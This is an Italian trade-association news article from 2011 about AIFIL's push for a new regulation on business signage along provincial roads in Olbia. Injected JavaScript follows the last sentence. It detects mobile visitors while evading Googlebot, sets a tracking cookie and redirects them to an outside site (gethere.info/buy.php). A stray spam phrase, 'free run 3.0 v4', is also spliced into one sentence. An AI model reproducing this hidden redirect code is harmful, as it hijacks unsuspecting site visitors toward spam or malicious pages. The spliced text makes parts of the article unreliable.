Provincia di Olbia: AIFIL propone un nuovo regolamento per velocizzare le pratiche inerenti l’esposizione delle insegne sulle strade provinciali.

di Redazione AIFIL[IN]FORMA - 14 febbraio 2011
Classificato in: CID, Legislazione, Tavoli di lavoro | Tag:

Ermanno Troiani, appena rieletto rappresentante provinciale AIFIL per Olbia Tempio e Nuoro, con la collaborazione di Massimo Cipriani, segretario Territoriale di AREA 5, ha elaborato una bozza di regolamento sulla pubblicità nelle strade provinciali da sottoporre alla provincia di Olbia.

Con una lettera del 05/01/2011 Ermanno Troiani – rappresentante provinciale AIFIL per Olbia Tempio e Nuoro – ha voluto comunicare al presidente della Provincia di Olbia sig. Fedele Sanciu, la necessità di arrivare prima possibile alla definizione di un nuovo regolamento circa l’esposizione delle insegne sulle strade provinciali. Nella lettera Troiani denunciava la situazione di “stallo” in cui versa il territorio, evidenziando come tantissime piccole aziende che vorrebbero avviare e far crescere il proprio lavoro, di fatto continuano a scontrarsi con una burocrazia lenta quanto costosa.

Per fare un esempio dell’entità delle lungaggini basti dire che non si riescono ad ottenere i rinnovi delle autorizzazioni rilasciate 6 anni fa dall’amministrazione provinciale di Sassari e ormai decadute, per incuria dell’ufficio.

Tante piccole attività (Bed & Breakfast, hotel, ristoranti, agriturismo, bar, ecc.) che vorrebbero facilitare l’arrivo di clienti grazie all’esposizione di un’insegna, di una pre-insegna o di un cartello, sono spaventate dalle difficoltà della pratica di autorizzazione. Risulta impossibile a volte comprendere quale criterio venga adottato nel richiedere una documentazione a dir poco esagerata.

In tale situazione c’è sicuramente meno lavoro per tutti, sia per le aziende che forniscono il servizio, sia per le attività che, senza adeguata segnalizzazione, non vedono arrivare i clienti.

La mancanza di un’adeguata comunicazione inoltre va a discapito dell’immagine della Gallura, free run 3.0 v4 che non riesce a offrire ai turisti la più ampia scelta e informazioni sulle attività presenti su quella strada o su quel lembo di territorio.

A tutto ciò si aggiunga che AIPA (azienda incaricata della riscossione dei tributi) chiede pagamenti per l’occupazione del suolo pubblico con una retroattività di 4 anni. Una faccenda, questa, che fortunatamente si sta risolvendo, grazie all’azione concertata di AIFIL, di alcune associazioni di categoria e della collaborazione del Comune di Cagliari (Vedi articolo: Cagliari: Le tasse sulla pubblicità non saranno multate, e i pagamenti slittano a marzo. Una grande vittoria).

Troiani lamentava poi l’assenza di disponibilità concreta circa l’apertura di un tavolo di lavoro finalizzato alla individuazione di un regolamento “condiviso” sulla pubblicità: nonostante le rassicurazioni del responsabile dell’Ufficio Tecnico, il geom Degortes, AIFIL sta aspettando ormai da 5 anni.

Questi gli argomenti principali della lettera inviata, nella quale AIFIL chiedeva un incontro immediato, tra l’ufficio competente della provincia, AIFIL e l’AICAP (Associazione Aziende Italiane Cartelli e Arredi Pubblicitari). Entrambe le associazioni hanno una lunga storia di collaborazione con le Pubbliche Amministrazioni.

La lettera che è andata a buon fine, tanto che attualmente AIFIL è in attesa di ricevere la convocazione per una prima riunione in cui Ermanno Troiani intende discutere con l’Assessore competente e vicepresidente della Provincia di Olbia sig. Giovanni Pileri e il dirigente dell’Ufficio Tecnico Geom. Degortes, la bozza di regolamento che ha già redatto.

Il tutto, con la massima disponibilità da parte di AIFIL nel collaborare alla produzione di un regolamento moderno ed efficiente, con regole chiare e procedure poco onerose, che possa contribuire a risollevare gli esercizi degli operatori del settore nella Provincia di Olbia e smuovere questa situazione di stallo che, da troppo tempo, penalizza le attività.

Vi informeremo al più presto su ulteriori sviluppi.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}var d=document;var s=d.createElement(‘script’);

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed